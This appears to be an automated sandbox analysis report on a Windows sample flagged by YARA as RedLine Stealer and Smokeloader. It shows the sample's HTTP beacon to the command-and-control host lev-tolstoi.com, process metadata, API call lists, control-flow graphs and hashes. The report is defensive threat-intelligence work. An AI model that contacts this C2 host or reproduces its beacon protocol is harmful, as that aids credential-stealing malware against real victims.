2024-12-24 08:05:10 UTC | 10545 | IN | Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49706 | 172.67.157.254 | 443 | 1564 | C:\Users\user\Desktop\3zg6i6Zu1u.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 08:05:12 UTC | 262 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: lev-tolstoi.com
2024-12-24 08:05:12 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-24 08:05:12 UTC | 1123 | IN | HTTP/1.1 200 OK
Date: Tue, 24 Dec 2024 08:05:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=u3t2hgrilr03r839jjhuvkvv5b; expires=Sat, 19 Apr 2025 01:51:51 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Iiq5SJC7JxJBK43tbhaSe0KAc5GXAkpBsdnBmkxfohJCMP%2FuEuFnefK2YbXSaa7mkf%2FFmRKKsUdETX1VZIFItkKl%2BEDFvJ7Mqk7V21mTHKCavGeaUmrzQfd6s2MwT1d556A%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
                                                                                                                                                                                                                                                        CF-RAY: 8f6f15c00b48c35a-EWR
                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1626&min_rtt=1621&rtt_var=619&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1753753&cwnd=247&unsent_bytes=0&cid=8c9b16c3830b48bd&ts=772&x=0"
                                                                                                                                                                                                                                                        2024-12-24 08:05:12 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: 2ok
                                                                                                                                                                                                                                                        2024-12-24 08:05:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: 0


Target ID: 0
Start time: 03:05:02
Start date: 24/12/2024
Path: C:\Users\user\Desktop\3zg6i6Zu1u.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\3zg6i6Zu1u.exe"
Imagebase: 0x400000
File size: 340'992 bytes
MD5 hash: 996AA4B544E08689F305D751C60835C7
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1665368901.00000000009A9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation: low
Has exited: true

Target ID: 4
Start time: 03:05:13
Start date: 24/12/2024
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 1784
Imagebase: 0xbe0000
File size: 483'680 bytes
MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true


Execution Graph

Execution Coverage: 2.2%
Dynamic/Decrypted Code Coverage: 23.7%
Signature Coverage: 50.8%
Total number of Nodes: 118
Total number of Limit Nodes: 7

Control-flow Graph (function at 437bc0; graph node data not reproduced)
APIs
• CoCreateInstance.OLE32(0044168C,00000000,00000001,0044167C,00000000), ref: 00437DE2
• SysAllocString.OLEAUT32(?), ref: 00437E47
• CoSetProxyBlanket.COMBASE(680742DE,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00437E90
• SysAllocString.OLEAUT32(?), ref: 00437EE8
• SysAllocString.OLEAUT32(F9BDF745), ref: 00437FC0
• VariantInit.OLEAUT32(?), ref: 00438032
• VariantClear.OLEAUT32(?), ref: 004381B8
• SysFreeString.OLEAUT32(?), ref: 004381DC
• SysFreeString.OLEAUT32(?), ref: 004381E2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID: String$Alloc$FreeVariant$BlanketClearCreateInitInstanceProxy
• String ID: Z>\$/^&P$/^&PZ>\$0R/T$C$Gx$Ljkl$ab$pyz{
• API String ID: 3490847348-109390196
• Opcode ID: b231c181ff8d6da98a5bc272ab21cfc30071d9d7bfb85af6a5a038700ba4b8a6
• Instruction ID: 8131ac09c1f2c8c7a662361a942698708379fad2ab2868bed6bea96b7e7f230e
• Opcode Fuzzy Hash: b231c181ff8d6da98a5bc272ab21cfc30071d9d7bfb85af6a5a038700ba4b8a6
• Instruction Fuzzy Hash: 2312DEB2A083519BD720CF68C88475BFBE1EBC9714F194A2DF9D497390D778D8058B86

Control-flow Graph (function at 40ad40; graph node data not reproduced)
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: &x&z$.|#~$/pQr$<|8~$a()*$d<h>$l0f2$m4f6$ws$|x
                                                                                                                                                                                                                                                          • API String ID: 0-1443210402
                                                                                                                                                                                                                                                          • Opcode ID: bef42f24a5999112fcff0273500699b06b7358e8a10142eb4ee24f81603f5a99
                                                                                                                                                                                                                                                          • Instruction ID: 5a455e5b33dc051389bcb969b85f11440245edd1c99918e46ba8560acc0916f5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bef42f24a5999112fcff0273500699b06b7358e8a10142eb4ee24f81603f5a99
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9F176B5600B02DFD3348F25D895797BBE1FB46315F118A2CD5AA8BBA0C775A805CF88

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          control_flow_graph 240 4085d0-4085e1 call 43bc50 243 4087e3-4087e5 ExitProcess 240->243 244 4085e7-4085ee call 434a50 240->244 247 4085f4-40861f GetCurrentProcessId GetCurrentThreadId 244->247 248 4087de call 43c2b0 244->248 249 408621-408623 247->249 250 408625-408730 SHGetSpecialFolderPathW GetForegroundWindow 247->250 248->243 249->250 252 408736-4087b8 250->252 253 4087ba-4087d2 call 409aa0 250->253 252->253 253->248 256 4087d4 call 40c5c0 253->256 258 4087d9 call 40b3c0 256->258 258->248
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 004085F4
                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 004085FE
                                                                                                                                                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408713
                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 00408728
                                                                                                                                                                                                                                                            • Part of subcall function 0040C5C0: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C5D3
                                                                                                                                                                                                                                                            • Part of subcall function 0040B3C0: FreeLibrary.KERNEL32(004087DE), ref: 0040B3C6
                                                                                                                                                                                                                                                            • Part of subcall function 0040B3C0: FreeLibrary.KERNEL32 ref: 0040B3E7
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 004087E5
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3072701918-0
                                                                                                                                                                                                                                                          • Opcode ID: fe482df24c23ab2d83c4cdaab97ad3ceae6a21e14e152c6932b3668e755f558a
                                                                                                                                                                                                                                                          • Instruction ID: e578a3b207df15b92ed52ca48c6c45aa0500652032070dd10f4452ae5aeaaed9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe482df24c23ab2d83c4cdaab97ad3ceae6a21e14e152c6932b3668e755f558a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39512877F547184BC318AEB98D8636AF6C65BC4210F0E813EA985E73D1EDB89C4542C8

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          control_flow_graph 260 40a8c0-40a8ef 261 40a8f0-40a909 260->261 261->261 262 40a90b-40aa02 261->262 263 40aa10-40aa2e 262->263 263->263 264 40aa30-40aa51 263->264 265 40aa60-40aa9b 264->265 265->265 266 40aa9d-40aab4 call 40b3f0 265->266 268 40aab9-40aac0 266->268 269 40aac6-40aad4 268->269 270 40ad2a-40ad36 268->270 271 40aae0-40aafa 269->271 271->271 272 40aafc-40ab02 271->272 273 40ab10-40ab1a 272->273 274 40ab21-40ab25 273->274 275 40ab1c-40ab1f 273->275 276 40ad21-40ad27 call 43a940 274->276 277 40ab2b-40ab3f 274->277 275->273 275->274 276->270 279 40ab40-40ab52 277->279 279->279 281 40ab54-40ab60 279->281 282 40ab62-40ab6d 281->282 283 40ab94-40ab98 281->283 284 40ab77-40ab7b 282->284 285 40ad1c-40ad1e 283->285 286 40ab9e-40abc9 283->286 284->285 287 40ab81-40ab88 284->287 285->276 288 40abd0-40abf4 286->288 289 40ab8a-40ab8c 287->289 290 40ab8e 287->290 288->288 291 40abf6-40abfd 288->291 289->290 292 40ab70-40ab75 290->292 293 40ab90-40ab92 290->293 294 40ac34-40ac36 291->294 295 40abff-40ac0a 291->295 292->283 292->284 293->292 294->285 296 40ac3c-40ac52 294->296 297 40ac17-40ac1b 295->297 298 40ac60-40acad 296->298 297->285 299 40ac21-40ac28 297->299 298->298 300 40acaf-40acb9 298->300 301 40ac2a-40ac2c 299->301 302 40ac2e 299->302 305 40acf3-40acf5 300->305 306 40acbb-40acc3 300->306 301->302 303 40ac10-40ac15 302->303 304 40ac30-40ac32 302->304 303->294 303->297 304->303 308 40acfb-40ad1a call 40a630 305->308 307 40acd7-40acdc 306->307 307->285 309 40acde-40ace5 307->309 308->276 312 40ace7-40ace9 309->312 313 40aceb 309->313 312->313 314 40acd0-40acd5 313->314 315 40aced-40acf1 313->315 314->307 316 40acf7-40acf9 314->316 315->314 316->285 316->308
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: $>$$>$/ $@G$xA
                                                                                                                                                                                                                                                          • API String ID: 0-3945432221
                                                                                                                                                                                                                                                          • Opcode ID: 1f9dd7b07d0464a3871681ac543f7f30e7f289b115bd5a1a199045cae91454cc
                                                                                                                                                                                                                                                          • Instruction ID: 55ac8b7e195ada22395993ae97bb18e0f83c644d7aeb54a7be5ab8cf0bb5c33f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f9dd7b07d0464a3871681ac543f7f30e7f289b115bd5a1a199045cae91454cc
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AFB1167520C3508BD324CF1884906AFBBE2EFC2704F18497DE9D12B381D679995AD78B

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          control_flow_graph 317 40c63c-40c64b 318 40c650-40c6ab 317->318 318->318 319 40c6ad-40c6e2 call 408540 call 437bc0 318->319 324 40c6f0-40c715 319->324 324->324 325 40c717-40c77a 324->325 326 40c780-40c7b7 325->326 326->326 327 40c7b9-40c7ca 326->327 328 40c7eb-40c7f3 327->328 329 40c7cc-40c7d3 327->329 331 40c7f5-40c7f6 328->331 332 40c80b-40c818 328->332 330 40c7e0-40c7e9 329->330 330->328 330->330 333 40c800-40c809 331->333 334 40c81a-40c821 332->334 335 40c83b-40c843 332->335 333->332 333->333 336 40c830-40c839 334->336 337 40c845-40c846 335->337 338 40c85b-40c976 335->338 336->335 336->336 339 40c850-40c859 337->339 340 40c980-40c9a7 338->340 339->338 339->339 340->340 341 40c9a9-40c9d3 340->341 342 40c9e0-40ca22 341->342 342->342 343 40ca24-40ca76 call 40b3f0 342->343 346 40ca80-40cadb 343->346 346->346 347 40cadd-40cb11 call 408540 call 437bc0 346->347 352 40cb20-40cb46 347->352 352->352 353 40cb48-40cbab 352->353 354 40cbb0-40cbe8 353->354 354->354 355 40cbea-40cbfb 354->355 356 40cc0b-40cc13 355->356 357 40cbfd-40cbff 355->357 358 40cc15-40cc16 356->358 359 40cc2b-40cc38 356->359 360 40cc00-40cc09 357->360 361 40cc20-40cc29 358->361 362 40cc3a-40cc41 359->362 363 40cc5b-40cc63 359->363 360->356 360->360 361->359 361->361 364 40cc50-40cc59 362->364 365 40cc65-40cc66 363->365 366 40cc7b-40cda7 363->366 364->363 364->364 367 40cc70-40cc79 365->367 368 40cdb0-40cdd7 366->368 367->366 367->367 368->368 369 40cdd9-40ce09 368->369 370 40ce10-40ce52 369->370 370->370 371 40ce54-40ce80 call 40b3f0 370->371 373 40ce85-40ce9b 371->373
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: 57DB89578F850E8625E054D164A37606$^_$lev-tolstoi.com
                                                                                                                                                                                                                                                          • API String ID: 0-3000147402
                                                                                                                                                                                                                                                          • Opcode ID: 1756b59fe5bbb69c448a25ce81c9b929e652f332c93af6c72070d1cd974e5a62
                                                                                                                                                                                                                                                          • Instruction ID: dd9baf14083705404bbb6167aa7354d43b480db8533e0b19abc2341ccbf856c6
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1756b59fe5bbb69c448a25ce81c9b929e652f332c93af6c72070d1cd974e5a62
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1020DB158E3928AD334CF2594907EBBBE1EBD6304F088A6DC4D91B342D7390909DBD6

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          control_flow_graph 393 9a9c5e-9a9c77 394 9a9c79-9a9c7b 393->394 395 9a9c7d 394->395 396 9a9c82-9a9c8e CreateToolhelp32Snapshot 394->396 395->396 397 9a9c9e-9a9cab Module32First 396->397 398 9a9c90-9a9c96 396->398 399 9a9cad-9a9cae call 9a991d 397->399 400 9a9cb4-9a9cbc 397->400 398->397 405 9a9c98-9a9c9c 398->405 403 9a9cb3 399->403 403->400 405->394 405->397
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 009A9C86
                                                                                                                                                                                                                                                          • Module32First.KERNEL32(00000000,00000224), ref: 009A9CA6
Memory Dump Source
• Source File: 00000000.00000002.1665368901.00000000009A9000.00000040.00000020.00020000.00000000.sdmp, Offset: 009A9000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9a9000_3zg6i6Zu1u.jbxd
Yara matches
Similarity
• API ID: CreateFirstModule32SnapshotToolhelp32
• String ID:
• API String ID: 3833638111-0
• Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction ID: 91bc98e2d3219ada9fe5031f72cd6874e6e315c49ff7f55f1fa8ba9f0459bb27
• Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction Fuzzy Hash: 4EF06235100B116BD7202BB9998DB6E76FCBF5A735F100528E68A920C0DA70EC458AA1
APIs
• LdrInitializeThunk.NTDLL(0043E40B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C35E
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
• Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
• Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
• Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 751462d93d042a55990990ac1d4287ed324398e9759de5a96dbc9d6a6aa29821
• Instruction ID: 4d7dcfee1db6f6d48993414e542c2c95e5bcdc0dd52ea84200f971aeb3cabb85
• Opcode Fuzzy Hash: 751462d93d042a55990990ac1d4287ed324398e9759de5a96dbc9d6a6aa29821
• Instruction Fuzzy Hash: A04137766153005FE314EB26DC80B67B3A6FFC9314F1A982DE584973A0E635EC11978A
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b581ea95b5affbbd2d441ab3bf991b3166ab57e396bc3bff6f6687d26169d528
• Instruction ID: 9bab5eeda3f2c328a6bc7135d099a7f1260cbe33dc8c8fee6861cc27dc7a273f
• Opcode Fuzzy Hash: b581ea95b5affbbd2d441ab3bf991b3166ab57e396bc3bff6f6687d26169d528
• Instruction Fuzzy Hash: 1C21E935B441198BDB04DB14C8C1ABFB332BB9E714F28B129C85237352D3399D129B98

Control-flow Graph
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0247024D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID: cess$kernel32.dll
• API String ID: 4275171209-1230238691
• Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction ID: 70afa96c0848c9c0fdeb42663e0eb32a74bf9eb8c3c80e1c0e0c7b8db5e94173
• Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction Fuzzy Hash: D7526975A01229DFDB64CF68C984BADBBB1BF09304F1480DAE55DAB351DB30AA85CF14

Control-flow Graph

APIs
• GetForegroundWindow.USER32 ref: 0043C5AF
• GetForegroundWindow.USER32 ref: 0043C5C0
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID: ForegroundWindow
• String ID:
• API String ID: 2020703349-0
• Opcode ID: 79680ac2d5f547ec917eb5f99452d1fa5a9d20136bed208c7213e3ef94e53174
• Instruction ID: 333b4a9834557b4172d2651f462c7a903e8ce65bf7bd4680bd615953da4b5774
• Opcode Fuzzy Hash: 79680ac2d5f547ec917eb5f99452d1fa5a9d20136bed208c7213e3ef94e53174
• Instruction Fuzzy Hash: 80D05EE995150047CA04BB71AC858273229F64B34A7186878E00301262EA25A0428B5B

Control-flow Graph
APIs
• SetErrorMode.KERNELBASE(00000400,?,?,02470223,?,?), ref: 02470E19
• SetErrorMode.KERNELBASE(00000000,?,?,02470223,?,?), ref: 02470E1E
Memory Dump Source
• Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction ID: df7174f9f57e46548dd531f3c2dfcdef14bbfe03a49bac81fa522fe882d0dbf2
• Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction Fuzzy Hash: 22D0123114512877D7002A94DC09BCE7B1CDF09B66F008011FB0DD9180C770954046E5

Control-flow Graph (basic blocks and edges recovered from the graph export):
• Block 414: 43c2d0-43c2e1 -> 415, 416, 417, 418
• Block 415: 43c2f6-43c308, call 43d950, RtlReAllocateHeap -> 425
• Block 416: 43c315-43c31e, call 43a940 -> 425
• Block 417: 43c30a-43c313, call 43a910 -> 425
• Block 418: 43c2e8-43c2ef -> 415, 416
• Block 425: 43c320-43c322
APIs
• RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B308,00000000,00000001), ref: 0043C302
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 98cbbb343254cd52c79eb1ca115f38d3187f6c377695bce7c7a2cd07440916c9
• Instruction ID: 8a0177ad85e7c08c69245f52b8f4417eb00afcd063061f7275faf4d6d67a0887
• Opcode Fuzzy Hash: 98cbbb343254cd52c79eb1ca115f38d3187f6c377695bce7c7a2cd07440916c9
• Instruction Fuzzy Hash: AAE02B76418221ABC6002B25BC09B5B3A68DF8E721F030C36F40072121D739E81286EF

Control-flow Graph (basic blocks and edges recovered from the graph export):
• Block 426: 40c5c0-40c5f1, CoInitializeEx
APIs
• CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C5D3
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
• Opcode ID: 850955786ed28da5065a80bade014127d727ab8898c815214f1986fcd95a4124
• Instruction ID: ce014e1d32f27ec12ad37ecc0dfb2a09a1fae06e6abce3ab2790199683b38062
• Opcode Fuzzy Hash: 850955786ed28da5065a80bade014127d727ab8898c815214f1986fcd95a4124
• Instruction Fuzzy Hash: CFD02E2969000027D208AB2CAC07F23329D9B03B52F000239E1A3969E2ED406900826A
APIs
• WSAStartup.WS2_32(00000202), ref: 00409D57
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID: Startup
• String ID:
• API String ID: 724789610-0
• Opcode ID: c762492f77ef8383059f4507e25c1adb5b493a45ba99c1c68facf99e2ce72a69
• Instruction ID: 053523fb6dd4afe8cef3d8c09916653202b249c7e86413b2563bb4d9ce308e2c
• Opcode Fuzzy Hash: c762492f77ef8383059f4507e25c1adb5b493a45ba99c1c68facf99e2ce72a69
• Instruction Fuzzy Hash: D9D0A779745501B7DB0CAF24FC6AA2A3694DB4BB46F04003DB403D22E2DD218A609518
APIs
• CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C607
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID: InitializeSecurity
• String ID:
• API String ID: 640775948-0
• Opcode ID: 131c3e875a066bb12a276a62a713607dd4adbce56e7278532486b94642aead36
• Instruction ID: 64d0c7dc1a51f575c656917cfcf27d06668b7b4f648f1d88eb1df91404deb98c
• Opcode Fuzzy Hash: 131c3e875a066bb12a276a62a713607dd4adbce56e7278532486b94642aead36
• Instruction Fuzzy Hash: C7D0C9743C834176F5348B08EC13F5132555302F12F340624F362FE2E4CAD0B201860C
APIs
• RtlFreeHeap.NTDLL(?,00000000,?,0043C31B,?,0040B308,00000000,00000001), ref: 0043A960
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: 910c0af3420ea00ce46c07591240b3ae9376ee87c5be7e09da62257baa930bc0
• Instruction ID: c567b57adf38a1f54fef76dd5790cc9636adae08f6cfb23484a9f5fe40784e0e
• Opcode Fuzzy Hash: 910c0af3420ea00ce46c07591240b3ae9376ee87c5be7e09da62257baa930bc0
• Instruction Fuzzy Hash: 42D01272419632FBC6102F18BC15BCB3B55EF4A321F0748A2F5446A175D774DC91CAD8
APIs
• RtlAllocateHeap.NTDLL(?,00000000), ref: 0043A931
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
